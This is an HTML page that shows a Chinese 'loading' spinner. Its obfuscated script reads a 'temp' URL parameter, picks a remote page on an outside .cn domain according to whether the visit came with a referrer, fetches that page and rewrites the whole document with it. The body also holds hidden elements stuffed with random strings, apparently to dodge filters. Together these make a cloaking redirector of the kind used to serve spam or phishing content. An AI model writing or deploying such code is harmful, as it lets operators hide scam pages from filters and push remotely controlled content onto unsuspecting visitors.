<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wqCUzG72U {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wqCUzG72U .p8LTMPm {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wqCUzG72U .content {
            line-height: 50px;
            text-align: center
        }

        .wqCUzG72U .img {
            width: 100%
        }

        .wqCUzG72U .mb7Kye2akpX {
            text-align: center
        }

        .wqCUzG72U .mb7Kye2akpX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wqCUzG72U .mb7Kye2akpX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wqCUzG72U .mb7Kye2akpX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wqCUzG72U .mb7Kye2akpX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wqCUzG72U .mb7Kye2akpX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wqCUzG72U .mb7Kye2akpX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wqCUzG72U .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wJutbHIZXX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tRMRX = wJutbHIZXX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tRMRX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tRMRX +".html?a=share";
		}
		
        aI9Cvv=url+"#"+new Date().getTime();
        aI9Cvv && function() {
            $.get(aI9Cvv, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ThyVtjmPVuJXNzE3AURYSryEINMkB2MIbJ0iC8l7ZvUSmBFj9ykxfxULBNX9aellY31</b>
<span style='display:none'>IBJRpjaPEzGoc043JuG8MOYLvxd4eVGq99vfAZcvXjJXRWrflUS</span>
<a  href='#' style='display:none'>zF5vh0zbv5L4pRr2DqxS9RsGzLvyyA77JSdMhPBt67mRP5i2kW</a>
<div style='display:none'>WkC0o6pDCH1p2ucGBxbeHNlW2rJS3uNZ4N8Sxy0spqAqsap0vYI4H1ekd3dFpvAR34DX</div>
<ul style='display:none' >K8plU2zVfY6ceunY</ul>
<ul style='display:none' >K8plU2zVfY6ceunY</ul>
<div style='display:none'>WkC0o6pDCH1p2ucGBxbeHNlW2rJS3uNZ4N8Sxy0spqAqsap0vYI4H1ekd3dFpvAR34DX</div>
<a  href='#' style='display:none'>zF5vh0zbv5L4pRr2DqxS9RsGzLvyyA77JSdMhPBt67mRP5i2kW</a>
<ul style='display:none' >K8plU2zVfY6ceunY</ul><div class="wqCUzG72U">
    <div class="p8LTMPm">
        <div class="mb7Kye2akpX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>atr9aMTpjpsDGIlCkZJyicR3HR8ygi15JeHFYvXD0Q5GCFIDrhtkPFaiZj27jsPNt5ECDTG9L</p>
<p  style='display:none'>atr9aMTpjpsDGIlCkZJyicR3HR8ygi15JeHFYvXD0Q5GCFIDrhtkPFaiZj27jsPNt5ECDTG9L</p>
<span style='display:none'>hBnN2961IhkcX3UxgJHpbtEZVeyT93wMc8bzL2otbf9R6fqFxTMjj9QC16QFeu7NONwL2nrRyJIuadjVbC6JZ7NrAI1qvk6Krjol</span>
<li style='display:none' >kebLYwTRQHbHYNc6AxZrGyihKRVTHJjx6XfKmgAz</li></body>
</html>